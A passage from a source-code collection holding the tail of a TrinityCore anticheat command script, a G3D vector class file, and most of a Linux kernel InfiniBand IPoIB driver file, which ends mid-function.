uint32 jump_reports = sAnticheatMgr->GetTypeReports(guid,3);
uint32 waterwalk_reports = sAnticheatMgr->GetTypeReports(guid,2);
uint32 teleportplane_reports = sAnticheatMgr->GetTypeReports(guid,4);
uint32 climb_reports = sAnticheatMgr->GetTypeReports(guid,5);
handler->PSendSysMessage("Information about player %s",player->GetName().c_str());
handler->PSendSysMessage("Average: %f || Total Reports: %u ",average,total_reports);
handler->PSendSysMessage("Speed Reports: %u || Fly Reports: %u || Jump Reports: %u ",speed_reports,fly_reports,jump_reports);
handler->PSendSysMessage("Walk On Water Reports: %u || Teleport To Plane Reports: %u",waterwalk_reports,teleportplane_reports);
handler->PSendSysMessage("Climb Reports: %u", climb_reports);
return true;
}
static bool HandleAntiCheatHandleCommand(ChatHandler* handler, const char* args)
{
std::string strCommand;
char* command = strtok((char*)args, " ");
if (!command)
return true;
if (!handler->GetSession()->GetPlayer())
return true;
strCommand = command;
if (strCommand.compare("on") == 0)
{
sWorld->setBoolConfig(CONFIG_ANTICHEAT_ENABLE,true);
handler->SendSysMessage("The Anticheat System is now: Enabled!");
}
else if (strCommand.compare("off") == 0)
{
sWorld->setBoolConfig(CONFIG_ANTICHEAT_ENABLE,false);
handler->SendSysMessage("The Anticheat System is now: Disabled!");
}
return true;
}
static bool HandleAntiCheatGlobalCommand(ChatHandler* handler, const char* args)
{
if (!sWorld->getBoolConfig(CONFIG_ANTICHEAT_ENABLE))
{
handler->PSendSysMessage("The Anticheat System is disabled.");
return true;
}
sAnticheatMgr->AnticheatGlobalCommand(handler);
return true;
}
};
void AddSC_anticheat_commandscript()
{
new anticheat_commandscript();
}
| gpl-2.0 |
HonosDev/TrinityCore | dep/g3dlite/source/Vector2int16.cpp | 260 | 1576 | /**
\file G3D/Vector2int16.cpp
\author Morgan McGuire, http://graphics.cs.williams.edu
\created 2003-08-09
\edited 2011-01-06
*/
#include "G3D/platform.h"
#include "G3D/g3dmath.h"
#include "G3D/Vector2int16.h"
#include "G3D/Vector2.h"
#include "G3D/BinaryInput.h"
#include "G3D/BinaryOutput.h"
#include "G3D/Any.h"
#include "G3D/Vector2int32.h"
namespace G3D {
Vector2int16::Vector2int16(const class Vector2int32& v) : x(v.x), y(v.y) {}
Vector2int16::Vector2int16(const Any& any) {
any.verifyName("Vector2int16", "Point2int16");
any.verifyType(Any::TABLE, Any::ARRAY);
any.verifySize(2);
if (any.type() == Any::ARRAY) {
x = any[0];
y = any[1];
} else {
// Table
x = any["x"];
y = any["y"];
}
}
Vector2int16& Vector2int16::operator=(const Any& a) {
*this = Vector2int16(a);
return *this;
}
Any Vector2int16::toAny() const {
Any any(Any::ARRAY, "Vector2int16");
any.append(x, y);
return any;
}
Vector2int16::Vector2int16(const class Vector2& v) {
x = (int16)iFloor(v.x + 0.5);
y = (int16)iFloor(v.y + 0.5);
}
Vector2int16::Vector2int16(class BinaryInput& bi) {
deserialize(bi);
}
void Vector2int16::serialize(class BinaryOutput& bo) const {
bo.writeInt16(x);
bo.writeInt16(y);
}
void Vector2int16::deserialize(class BinaryInput& bi) {
x = bi.readInt16();
y = bi.readInt16();
}
Vector2int16 Vector2int16::clamp(const Vector2int16& lo, const Vector2int16& hi) {
return Vector2int16(iClamp(x, lo.x, hi.x), iClamp(y, lo.y, hi.y));
}
}
| gpl-2.0 |
htc-mirror/endeavoru-2.6.39-86aa44d | drivers/infiniband/ulp/ipoib/ipoib_ib.c | 260 | 27798 | /*
* Copyright (c) 2004, 2005 Topspin Communications. All rights reserved.
* Copyright (c) 2005 Sun Microsystems, Inc. All rights reserved.
* Copyright (c) 2005 Mellanox Technologies. All rights reserved.
* Copyright (c) 2004, 2005 Voltaire, Inc. All rights reserved.
*
* This software is available to you under a choice of one of two
* licenses. You may choose to be licensed under the terms of the GNU
* General Public License (GPL) Version 2, available from the file
* COPYING in the main directory of this source tree, or the
* OpenIB.org BSD license below:
*
* Redistribution and use in source and binary forms, with or
* without modification, are permitted provided that the following
* conditions are met:
*
* - Redistributions of source code must retain the above
* copyright notice, this list of conditions and the following
* disclaimer.
*
* - Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following
* disclaimer in the documentation and/or other materials
* provided with the distribution.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
* EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
* NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
* BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
* ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
#include <linux/delay.h>
#include <linux/dma-mapping.h>
#include <linux/slab.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include "ipoib.h"
#ifdef CONFIG_INFINIBAND_IPOIB_DEBUG_DATA
static int data_debug_level;
module_param(data_debug_level, int, 0644);
MODULE_PARM_DESC(data_debug_level,
"Enable data path debug tracing if > 0");
#endif
static DEFINE_MUTEX(pkey_mutex);
struct ipoib_ah *ipoib_create_ah(struct net_device *dev,
struct ib_pd *pd, struct ib_ah_attr *attr)
{
struct ipoib_ah *ah;
ah = kmalloc(sizeof *ah, GFP_KERNEL);
if (!ah)
return NULL;
ah->dev = dev;
ah->last_send = 0;
kref_init(&ah->ref);
ah->ah = ib_create_ah(pd, attr);
if (IS_ERR(ah->ah)) {
kfree(ah);
ah = NULL;
} else
ipoib_dbg(netdev_priv(dev), "Created ah %p\n", ah->ah);
return ah;
}
void ipoib_free_ah(struct kref *kref)
{
struct ipoib_ah *ah = container_of(kref, struct ipoib_ah, ref);
struct ipoib_dev_priv *priv = netdev_priv(ah->dev);
unsigned long flags;
spin_lock_irqsave(&priv->lock, flags);
list_add_tail(&ah->list, &priv->dead_ahs);
spin_unlock_irqrestore(&priv->lock, flags);
}
static void ipoib_ud_dma_unmap_rx(struct ipoib_dev_priv *priv,
u64 mapping[IPOIB_UD_RX_SG])
{
if (ipoib_ud_need_sg(priv->max_ib_mtu)) {
ib_dma_unmap_single(priv->ca, mapping[0], IPOIB_UD_HEAD_SIZE,
DMA_FROM_DEVICE);
ib_dma_unmap_page(priv->ca, mapping[1], PAGE_SIZE,
DMA_FROM_DEVICE);
} else
ib_dma_unmap_single(priv->ca, mapping[0],
IPOIB_UD_BUF_SIZE(priv->max_ib_mtu),
DMA_FROM_DEVICE);
}
static void ipoib_ud_skb_put_frags(struct ipoib_dev_priv *priv,
struct sk_buff *skb,
unsigned int length)
{
if (ipoib_ud_need_sg(priv->max_ib_mtu)) {
skb_frag_t *frag = &skb_shinfo(skb)->frags[0];
unsigned int size;
/*
* There is only two buffers needed for max_payload = 4K,
* first buf size is IPOIB_UD_HEAD_SIZE
*/
skb->tail += IPOIB_UD_HEAD_SIZE;
skb->len += length;
size = length - IPOIB_UD_HEAD_SIZE;
frag->size = size;
skb->data_len += size;
skb->truesize += size;
} else
skb_put(skb, length);
}
static int ipoib_ib_post_receive(struct net_device *dev, int id)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
struct ib_recv_wr *bad_wr;
int ret;
priv->rx_wr.wr_id = id | IPOIB_OP_RECV;
priv->rx_sge[0].addr = priv->rx_ring[id].mapping[0];
priv->rx_sge[1].addr = priv->rx_ring[id].mapping[1];
ret = ib_post_recv(priv->qp, &priv->rx_wr, &bad_wr);
if (unlikely(ret)) {
ipoib_warn(priv, "receive failed for buf %d (%d)\n", id, ret);
ipoib_ud_dma_unmap_rx(priv, priv->rx_ring[id].mapping);
dev_kfree_skb_any(priv->rx_ring[id].skb);
priv->rx_ring[id].skb = NULL;
}
return ret;
}
static struct sk_buff *ipoib_alloc_rx_skb(struct net_device *dev, int id)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
struct sk_buff *skb;
int buf_size;
u64 *mapping;
if (ipoib_ud_need_sg(priv->max_ib_mtu))
buf_size = IPOIB_UD_HEAD_SIZE;
else
buf_size = IPOIB_UD_BUF_SIZE(priv->max_ib_mtu);
skb = dev_alloc_skb(buf_size + 4);
if (unlikely(!skb))
return NULL;
/*
* IB will leave a 40 byte gap for a GRH and IPoIB adds a 4 byte
* header. So we need 4 more bytes to get to 48 and align the
* IP header to a multiple of 16.
*/
skb_reserve(skb, 4);
mapping = priv->rx_ring[id].mapping;
mapping[0] = ib_dma_map_single(priv->ca, skb->data, buf_size,
DMA_FROM_DEVICE);
if (unlikely(ib_dma_mapping_error(priv->ca, mapping[0])))
goto error;
if (ipoib_ud_need_sg(priv->max_ib_mtu)) {
struct page *page = alloc_page(GFP_ATOMIC);
if (!page)
goto partial_error;
skb_fill_page_desc(skb, 0, page, 0, PAGE_SIZE);
mapping[1] =
ib_dma_map_page(priv->ca, skb_shinfo(skb)->frags[0].page,
0, PAGE_SIZE, DMA_FROM_DEVICE);
if (unlikely(ib_dma_mapping_error(priv->ca, mapping[1])))
goto partial_error;
}
priv->rx_ring[id].skb = skb;
return skb;
partial_error:
ib_dma_unmap_single(priv->ca, mapping[0], buf_size, DMA_FROM_DEVICE);
error:
dev_kfree_skb_any(skb);
return NULL;
}
static int ipoib_ib_post_receives(struct net_device *dev)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
int i;
for (i = 0; i < ipoib_recvq_size; ++i) {
if (!ipoib_alloc_rx_skb(dev, i)) {
ipoib_warn(priv, "failed to allocate receive buffer %d\n", i);
return -ENOMEM;
}
if (ipoib_ib_post_receive(dev, i)) {
ipoib_warn(priv, "ipoib_ib_post_receive failed for buf %d\n", i);
return -EIO;
}
}
return 0;
}
static void ipoib_ib_handle_rx_wc(struct net_device *dev, struct ib_wc *wc)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
unsigned int wr_id = wc->wr_id & ~IPOIB_OP_RECV;
struct sk_buff *skb;
u64 mapping[IPOIB_UD_RX_SG];
union ib_gid *dgid;
ipoib_dbg_data(priv, "recv completion: id %d, status: %d\n",
wr_id, wc->status);
if (unlikely(wr_id >= ipoib_recvq_size)) {
ipoib_warn(priv, "recv completion event with wrid %d (> %d)\n",
wr_id, ipoib_recvq_size);
return;
}
skb = priv->rx_ring[wr_id].skb;
if (unlikely(wc->status != IB_WC_SUCCESS)) {
if (wc->status != IB_WC_WR_FLUSH_ERR)
ipoib_warn(priv, "failed recv event "
"(status=%d, wrid=%d vend_err %x)\n",
wc->status, wr_id, wc->vendor_err);
ipoib_ud_dma_unmap_rx(priv, priv->rx_ring[wr_id].mapping);
dev_kfree_skb_any(skb);
priv->rx_ring[wr_id].skb = NULL;
return;
}
/*
* Drop packets that this interface sent, ie multicast packets
* that the HCA has replicated.
*/
if (wc->slid == priv->local_lid && wc->src_qp == priv->qp->qp_num)
goto repost;
memcpy(mapping, priv->rx_ring[wr_id].mapping,
IPOIB_UD_RX_SG * sizeof *mapping);
/*
* If we can't allocate a new RX buffer, dump
* this packet and reuse the old buffer.
*/
if (unlikely(!ipoib_alloc_rx_skb(dev, wr_id))) {
++dev->stats.rx_dropped;
goto repost;
}
ipoib_dbg_data(priv, "received %d bytes, SLID 0x%04x\n",
wc->byte_len, wc->slid);
ipoib_ud_dma_unmap_rx(priv, mapping);
ipoib_ud_skb_put_frags(priv, skb, wc->byte_len);
/* First byte of dgid signals multicast when 0xff */
dgid = &((struct ib_grh *)skb->data)->dgid;
if (!(wc->wc_flags & IB_WC_GRH) || dgid->raw[0] != 0xff)
skb->pkt_type = PACKET_HOST;
else if (memcmp(dgid, dev->broadcast + 4, sizeof(union ib_gid)) == 0)
skb->pkt_type = PACKET_BROADCAST;
else
skb->pkt_type = PACKET_MULTICAST;
skb_pull(skb, IB_GRH_BYTES);
skb->protocol = ((struct ipoib_header *) skb->data)->proto;
skb_reset_mac_header(skb);
skb_pull(skb, IPOIB_ENCAP_LEN);
++dev->stats.rx_packets;
dev->stats.rx_bytes += skb->len;
skb->dev = dev;
if (test_bit(IPOIB_FLAG_CSUM, &priv->flags) && likely(wc->csum_ok))
skb->ip_summed = CHECKSUM_UNNECESSARY;
napi_gro_receive(&priv->napi, skb);
repost:
if (unlikely(ipoib_ib_post_receive(dev, wr_id)))
ipoib_warn(priv, "ipoib_ib_post_receive failed "
"for buf %d\n", wr_id);
}
static int ipoib_dma_map_tx(struct ib_device *ca,
struct ipoib_tx_buf *tx_req)
{
struct sk_buff *skb = tx_req->skb;
u64 *mapping = tx_req->mapping;
int i;
int off;
if (skb_headlen(skb)) {
mapping[0] = ib_dma_map_single(ca, skb->data, skb_headlen(skb),
DMA_TO_DEVICE);
if (unlikely(ib_dma_mapping_error(ca, mapping[0])))
return -EIO;
off = 1;
} else
off = 0;
for (i = 0; i < skb_shinfo(skb)->nr_frags; ++i) {
skb_frag_t *frag = &skb_shinfo(skb)->frags[i];
mapping[i + off] = ib_dma_map_page(ca, frag->page,
frag->page_offset, frag->size,
DMA_TO_DEVICE);
if (unlikely(ib_dma_mapping_error(ca, mapping[i + off])))
goto partial_error;
}
return 0;
partial_error:
for (; i > 0; --i) {
skb_frag_t *frag = &skb_shinfo(skb)->frags[i - 1];
ib_dma_unmap_page(ca, mapping[i - !off], frag->size, DMA_TO_DEVICE);
}
if (off)
ib_dma_unmap_single(ca, mapping[0], skb_headlen(skb), DMA_TO_DEVICE);
return -EIO;
}
static void ipoib_dma_unmap_tx(struct ib_device *ca,
struct ipoib_tx_buf *tx_req)
{
struct sk_buff *skb = tx_req->skb;
u64 *mapping = tx_req->mapping;
int i;
int off;
if (skb_headlen(skb)) {
ib_dma_unmap_single(ca, mapping[0], skb_headlen(skb), DMA_TO_DEVICE);
off = 1;
} else
off = 0;
for (i = 0; i < skb_shinfo(skb)->nr_frags; ++i) {
skb_frag_t *frag = &skb_shinfo(skb)->frags[i];
ib_dma_unmap_page(ca, mapping[i + off], frag->size,
DMA_TO_DEVICE);
}
}
static void ipoib_ib_handle_tx_wc(struct net_device *dev, struct ib_wc *wc)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
unsigned int wr_id = wc->wr_id;
struct ipoib_tx_buf *tx_req;
ipoib_dbg_data(priv, "send completion: id %d, status: %d\n",
wr_id, wc->status);
if (unlikely(wr_id >= ipoib_sendq_size)) {
ipoib_warn(priv, "send completion event with wrid %d (> %d)\n",
wr_id, ipoib_sendq_size);
return;
}
tx_req = &priv->tx_ring[wr_id];
ipoib_dma_unmap_tx(priv->ca, tx_req);
++dev->stats.tx_packets;
dev->stats.tx_bytes += tx_req->skb->len;
dev_kfree_skb_any(tx_req->skb);
++priv->tx_tail;
if (unlikely(--priv->tx_outstanding == ipoib_sendq_size >> 1) &&
netif_queue_stopped(dev) &&
test_bit(IPOIB_FLAG_ADMIN_UP, &priv->flags))
netif_wake_queue(dev);
if (wc->status != IB_WC_SUCCESS &&
wc->status != IB_WC_WR_FLUSH_ERR)
ipoib_warn(priv, "failed send event "
"(status=%d, wrid=%d vend_err %x)\n",
wc->status, wr_id, wc->vendor_err);
}
static int poll_tx(struct ipoib_dev_priv *priv)
{
int n, i;
n = ib_poll_cq(priv->send_cq, MAX_SEND_CQE, priv->send_wc);
for (i = 0; i < n; ++i)
ipoib_ib_handle_tx_wc(priv->dev, priv->send_wc + i);
return n == MAX_SEND_CQE;
}
int ipoib_poll(struct napi_struct *napi, int budget)
{
struct ipoib_dev_priv *priv = container_of(napi, struct ipoib_dev_priv, napi);
struct net_device *dev = priv->dev;
int done;
int t;
int n, i;
done = 0;
poll_more:
while (done < budget) {
int max = (budget - done);
t = min(IPOIB_NUM_WC, max);
n = ib_poll_cq(priv->recv_cq, t, priv->ibwc);
for (i = 0; i < n; i++) {
struct ib_wc *wc = priv->ibwc + i;
if (wc->wr_id & IPOIB_OP_RECV) {
++done;
if (wc->wr_id & IPOIB_OP_CM)
ipoib_cm_handle_rx_wc(dev, wc);
else
ipoib_ib_handle_rx_wc(dev, wc);
} else
ipoib_cm_handle_tx_wc(priv->dev, wc);
}
if (n != t)
break;
}
if (done < budget) {
napi_complete(napi);
if (unlikely(ib_req_notify_cq(priv->recv_cq,
IB_CQ_NEXT_COMP |
IB_CQ_REPORT_MISSED_EVENTS)) &&
napi_reschedule(napi))
goto poll_more;
}
return done;
}
void ipoib_ib_completion(struct ib_cq *cq, void *dev_ptr)
{
struct net_device *dev = dev_ptr;
struct ipoib_dev_priv *priv = netdev_priv(dev);
napi_schedule(&priv->napi);
}
static void drain_tx_cq(struct net_device *dev)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
netif_tx_lock(dev);
while (poll_tx(priv))
; /* nothing */
if (netif_queue_stopped(dev))
mod_timer(&priv->poll_timer, jiffies + 1);
netif_tx_unlock(dev);
}
void ipoib_send_comp_handler(struct ib_cq *cq, void *dev_ptr)
{
struct ipoib_dev_priv *priv = netdev_priv(dev_ptr);
mod_timer(&priv->poll_timer, jiffies);
}
static inline int post_send(struct ipoib_dev_priv *priv,
unsigned int wr_id,
struct ib_ah *address, u32 qpn,
struct ipoib_tx_buf *tx_req,
void *head, int hlen)
{
struct ib_send_wr *bad_wr;
int i, off;
struct sk_buff *skb = tx_req->skb;
skb_frag_t *frags = skb_shinfo(skb)->frags;
int nr_frags = skb_shinfo(skb)->nr_frags;
u64 *mapping = tx_req->mapping;
if (skb_headlen(skb)) {
priv->tx_sge[0].addr = mapping[0];
priv->tx_sge[0].length = skb_headlen(skb);
off = 1;
} else
off = 0;
for (i = 0; i < nr_frags; ++i) {
priv->tx_sge[i + off].addr = mapping[i + off];
priv->tx_sge[i + off].length = frags[i].size;
}
priv->tx_wr.num_sge = nr_frags + off;
priv->tx_wr.wr_id = wr_id;
priv->tx_wr.wr.ud.remote_qpn = qpn;
priv->tx_wr.wr.ud.ah = address;
if (head) {
priv->tx_wr.wr.ud.mss = skb_shinfo(skb)->gso_size;
priv->tx_wr.wr.ud.header = head;
priv->tx_wr.wr.ud.hlen = hlen;
priv->tx_wr.opcode = IB_WR_LSO;
} else
priv->tx_wr.opcode = IB_WR_SEND;
return ib_post_send(priv->qp, &priv->tx_wr, &bad_wr);
}
void ipoib_send(struct net_device *dev, struct sk_buff *skb,
struct ipoib_ah *address, u32 qpn)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
struct ipoib_tx_buf *tx_req;
int hlen, rc;
void *phead;
if (skb_is_gso(skb)) {
hlen = skb_transport_offset(skb) + tcp_hdrlen(skb);
phead = skb->data;
if (unlikely(!skb_pull(skb, hlen))) {
ipoib_warn(priv, "linear data too small\n");
++dev->stats.tx_dropped;
++dev->stats.tx_errors;
dev_kfree_skb_any(skb);
return;
}
} else {
if (unlikely(skb->len > priv->mcast_mtu + IPOIB_ENCAP_LEN)) {
ipoib_warn(priv, "packet len %d (> %d) too long to send, dropping\n",
skb->len, priv->mcast_mtu + IPOIB_ENCAP_LEN);
++dev->stats.tx_dropped;
++dev->stats.tx_errors;
ipoib_cm_skb_too_long(dev, skb, priv->mcast_mtu);
return;
}
phead = NULL;
hlen = 0;
}
ipoib_dbg_data(priv, "sending packet, length=%d address=%p qpn=0x%06x\n",
skb->len, address, qpn);
/*
* We put the skb into the tx_ring _before_ we call post_send()
* because it's entirely possible that the completion handler will
* run before we execute anything after the post_send(). That
* means we have to make sure everything is properly recorded and
* our state is consistent before we call post_send().
*/
tx_req = &priv->tx_ring[priv->tx_head & (ipoib_sendq_size - 1)];
tx_req->skb = skb;
if (unlikely(ipoib_dma_map_tx(priv->ca, tx_req))) {
++dev->stats.tx_errors;
dev_kfree_skb_any(skb);
return;
}
if (skb->ip_summed == CHECKSUM_PARTIAL)
priv->tx_wr.send_flags |= IB_SEND_IP_CSUM;
else
priv->tx_wr.send_flags &= ~IB_SEND_IP_CSUM;
if (++priv->tx_outstanding == ipoib_sendq_size) {
ipoib_dbg(priv, "TX ring full, stopping kernel net queue\n");
if (ib_req_notify_cq(priv->send_cq, IB_CQ_NEXT_COMP))
ipoib_warn(priv, "request notify on send CQ failed\n");
netif_stop_queue(dev);
}
rc = post_send(priv, priv->tx_head & (ipoib_sendq_size - 1),
address->ah, qpn, tx_req, phead, hlen);
if (unlikely(rc)) {
ipoib_warn(priv, "post_send failed, error %d\n", rc);
++dev->stats.tx_errors;
--priv->tx_outstanding;
ipoib_dma_unmap_tx(priv->ca, tx_req);
dev_kfree_skb_any(skb);
if (netif_queue_stopped(dev))
netif_wake_queue(dev);
} else {
dev->trans_start = jiffies;
address->last_send = priv->tx_head;
++priv->tx_head;
skb_orphan(skb);
}
if (unlikely(priv->tx_outstanding > MAX_SEND_CQE))
while (poll_tx(priv))
; /* nothing */
}
static void __ipoib_reap_ah(struct net_device *dev)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
struct ipoib_ah *ah, *tah;
LIST_HEAD(remove_list);
unsigned long flags;
netif_tx_lock_bh(dev);
spin_lock_irqsave(&priv->lock, flags);
list_for_each_entry_safe(ah, tah, &priv->dead_ahs, list)
if ((int) priv->tx_tail - (int) ah->last_send >= 0) {
list_del(&ah->list);
ib_destroy_ah(ah->ah);
kfree(ah);
}
spin_unlock_irqrestore(&priv->lock, flags);
netif_tx_unlock_bh(dev);
}
void ipoib_reap_ah(struct work_struct *work)
{
struct ipoib_dev_priv *priv =
container_of(work, struct ipoib_dev_priv, ah_reap_task.work);
struct net_device *dev = priv->dev;
__ipoib_reap_ah(dev);
if (!test_bit(IPOIB_STOP_REAPER, &priv->flags))
queue_delayed_work(ipoib_workqueue, &priv->ah_reap_task,
round_jiffies_relative(HZ));
}
static void ipoib_ib_tx_timer_func(unsigned long ctx)
{
drain_tx_cq((struct net_device *)ctx);
}
int ipoib_ib_dev_open(struct net_device *dev)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
int ret;
if (ib_find_pkey(priv->ca, priv->port, priv->pkey, &priv->pkey_index)) {
ipoib_warn(priv, "P_Key 0x%04x not found\n", priv->pkey);
clear_bit(IPOIB_PKEY_ASSIGNED, &priv->flags);
return -1;
}
set_bit(IPOIB_PKEY_ASSIGNED, &priv->flags);
ret = ipoib_init_qp(dev);
if (ret) {
ipoib_warn(priv, "ipoib_init_qp returned %d\n", ret);
return -1;
}
ret = ipoib_ib_post_receives(dev);
if (ret) {
ipoib_warn(priv, "ipoib_ib_post_receives returned %d\n", ret);
ipoib_ib_dev_stop(dev, 1);
return -1;
}
ret = ipoib_cm_dev_open(dev);
if (ret) {
ipoib_warn(priv, "ipoib_cm_dev_open returned %d\n", ret);
ipoib_ib_dev_stop(dev, 1);
return -1;
}
clear_bit(IPOIB_STOP_REAPER, &priv->flags);
queue_delayed_work(ipoib_workqueue, &priv->ah_reap_task,
round_jiffies_relative(HZ));
if (!test_and_set_bit(IPOIB_FLAG_INITIALIZED, &priv->flags))
napi_enable(&priv->napi);
return 0;
}
static void ipoib_pkey_dev_check_presence(struct net_device *dev)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
u16 pkey_index = 0;
if (ib_find_pkey(priv->ca, priv->port, priv->pkey, &pkey_index))
clear_bit(IPOIB_PKEY_ASSIGNED, &priv->flags);
else
set_bit(IPOIB_PKEY_ASSIGNED, &priv->flags);
}
int ipoib_ib_dev_up(struct net_device *dev)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
ipoib_pkey_dev_check_presence(dev);
if (!test_bit(IPOIB_PKEY_ASSIGNED, &priv->flags)) {
ipoib_dbg(priv, "PKEY is not assigned.\n");
return 0;
}
set_bit(IPOIB_FLAG_OPER_UP, &priv->flags);
return ipoib_mcast_start_thread(dev);
}
int ipoib_ib_dev_down(struct net_device *dev, int flush)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
ipoib_dbg(priv, "downing ib_dev\n");
clear_bit(IPOIB_FLAG_OPER_UP, &priv->flags);
netif_carrier_off(dev);
/* Shutdown the P_Key thread if still active */
if (!test_bit(IPOIB_PKEY_ASSIGNED, &priv->flags)) {
mutex_lock(&pkey_mutex);
set_bit(IPOIB_PKEY_STOP, &priv->flags);
cancel_delayed_work(&priv->pkey_poll_task);
mutex_unlock(&pkey_mutex);
if (flush)
flush_workqueue(ipoib_workqueue);
}
ipoib_mcast_stop_thread(dev, flush);
ipoib_mcast_dev_flush(dev);
ipoib_flush_paths(dev);
return 0;
}
static int recvs_pending(struct net_device *dev)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
int pending = 0;
int i;
for (i = 0; i < ipoib_recvq_size; ++i)
if (priv->rx_ring[i].skb)
++pending;
return pending;
}
void ipoib_drain_cq(struct net_device *dev)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
int i, n;
/*
* We call completion handling routines that expect to be
* called from the BH-disabled NAPI poll context, so disable
* BHs here too.
*/
local_bh_disable();
do {
n = ib_poll_cq(priv->recv_cq, IPOIB_NUM_WC, priv->ibwc);
for (i = 0; i < n; ++i) {
/*
* Convert any successful completions to flush
* errors to avoid passing packets up the
* stack after bringing the device down.
*/
if (priv->ibwc[i].status == IB_WC_SUCCESS)
priv->ibwc[i].status = IB_WC_WR_FLUSH_ERR;
if (priv->ibwc[i].wr_id & IPOIB_OP_RECV) {
if (priv->ibwc[i].wr_id & IPOIB_OP_CM)
ipoib_cm_handle_rx_wc(dev, priv->ibwc + i);
else
ipoib_ib_handle_rx_wc(dev, priv->ibwc + i);
} else
ipoib_cm_handle_tx_wc(dev, priv->ibwc + i);
}
} while (n == IPOIB_NUM_WC);
while (poll_tx(priv))
; /* nothing */
local_bh_enable();
}
int ipoib_ib_dev_stop(struct net_device *dev, int flush)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
struct ib_qp_attr qp_attr;
unsigned long begin;
struct ipoib_tx_buf *tx_req;
int i;
if (test_and_clear_bit(IPOIB_FLAG_INITIALIZED, &priv->flags))
napi_disable(&priv->napi);
ipoib_cm_dev_stop(dev);
/*
* Move our QP to the error state and then reinitialize in
* when all work requests have completed or have been flushed.
*/
qp_attr.qp_state = IB_QPS_ERR;
if (ib_modify_qp(priv->qp, &qp_attr, IB_QP_STATE))
ipoib_warn(priv, "Failed to modify QP to ERROR state\n");
/* Wait for all sends and receives to complete */
begin = jiffies;
while (priv->tx_head != priv->tx_tail || recvs_pending(dev)) {
if (time_after(jiffies, begin + 5 * HZ)) {
ipoib_warn(priv, "timing out; %d sends %d receives not completed\n",
priv->tx_head - priv->tx_tail, recvs_pending(dev));
/*
* assume the HW is wedged and just free up
* all our pending work requests.
*/
while ((int) priv->tx_tail - (int) priv->tx_head < 0) {
tx_req = &priv->tx_ring[priv->tx_tail &
(ipoib_sendq_size - 1)];
ipoib_dma_unmap_tx(priv->ca, tx_req);
dev_kfree_skb_any(tx_req->skb);
++priv->tx_tail;
--priv->tx_outstanding;
}
for (i = 0; i < ipoib_recvq_size; ++i) {
struct ipoib_rx_buf *rx_req;
rx_req = &priv->rx_ring[i];
if (!rx_req->skb)
continue;
ipoib_ud_dma_unmap_rx(priv,
priv->rx_ring[i].mapping);
dev_kfree_skb_any(rx_req->skb);
rx_req->skb = NULL;
}
goto timeout;
}
ipoib_drain_cq(dev);
msleep(1);
}
ipoib_dbg(priv, "All sends and receives done.\n");
timeout:
del_timer_sync(&priv->poll_timer);
qp_attr.qp_state = IB_QPS_RESET;
if (ib_modify_qp(priv->qp, &qp_attr, IB_QP_STATE))
ipoib_warn(priv, "Failed to modify QP to RESET state\n");
/* Wait for all AHs to be reaped */
set_bit(IPOIB_STOP_REAPER, &priv->flags);
cancel_delayed_work(&priv->ah_reap_task);
if (flush)
flush_workqueue(ipoib_workqueue);
begin = jiffies;
while (!list_empty(&priv->dead_ahs)) {
__ipoib_reap_ah(dev);
if (time_after(jiffies, begin + HZ)) {
ipoib_warn(priv, "timing out; will leak address handles\n");
break;
}
msleep(1);
}
ib_req_notify_cq(priv->recv_cq, IB_CQ_NEXT_COMP);
return 0;
}
int ipoib_ib_dev_init(struct net_device *dev, struct ib_device *ca, int port)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
priv->ca = ca;
priv->port = port;
priv->qp = NULL;
if (ipoib_transport_dev_init(dev, ca)) {
printk(KERN_WARNING "%s: ipoib_transport_dev_init failed\n", ca->name);
return -ENODEV;
}
setup_timer(&priv->poll_timer, ipoib_ib_tx_timer_func,
(unsigned long) dev);
if (dev->flags & IFF_UP) {
if (ipoib_ib_dev_open(dev)) {
ipoib_transport_dev_cleanup(dev);
return -ENODEV;
}
}
return 0;
}
static void __ipoib_ib_dev_flush(struct ipoib_dev_priv *priv,
enum ipoib_flush_level level)
{
struct ipoib_dev_priv *cpriv;
struct net_device *dev = priv->dev;
u16 new_index;
mutex_lock(&priv->vlan_mutex);
/*
* Flush any child interfaces too -- they might be up even if
* the parent is down.
*/
list_for_each_entry(cpriv, &priv->child_intfs, list)
__ipoib_ib_dev_flush(cpriv, level);
mutex_unlock(&priv->vlan_mutex);
if (!test_bit(IPOIB_FLAG_INITIALIZED, &priv->flags)) {
ipoib_dbg(priv, "Not flushing - IPOIB_FLAG_INITIALIZED not set.\n");
return;
}
if (!test_bit(IPOIB_FLAG_ADMIN_UP, &priv->flags)) {
ipoib_dbg(priv, "Not flushing - IPOIB_FLAG_ADMIN_UP not set.\n");
return;
}
if (level == IPOIB_FLUSH_HEAVY) {
if (ib_find_pkey(priv->ca, priv->port, priv->pkey, &new_index)) {
clear_bit(IPOIB_PKEY_ASSIGNED, &priv->flags);
ipoib_ib_dev_down(dev, 0);
ipoib_ib_dev_stop(dev, 0);
if (ipoib_pkey_dev_delay_open(dev))
return;
}
/* restart QP only if P_Key index is changed */
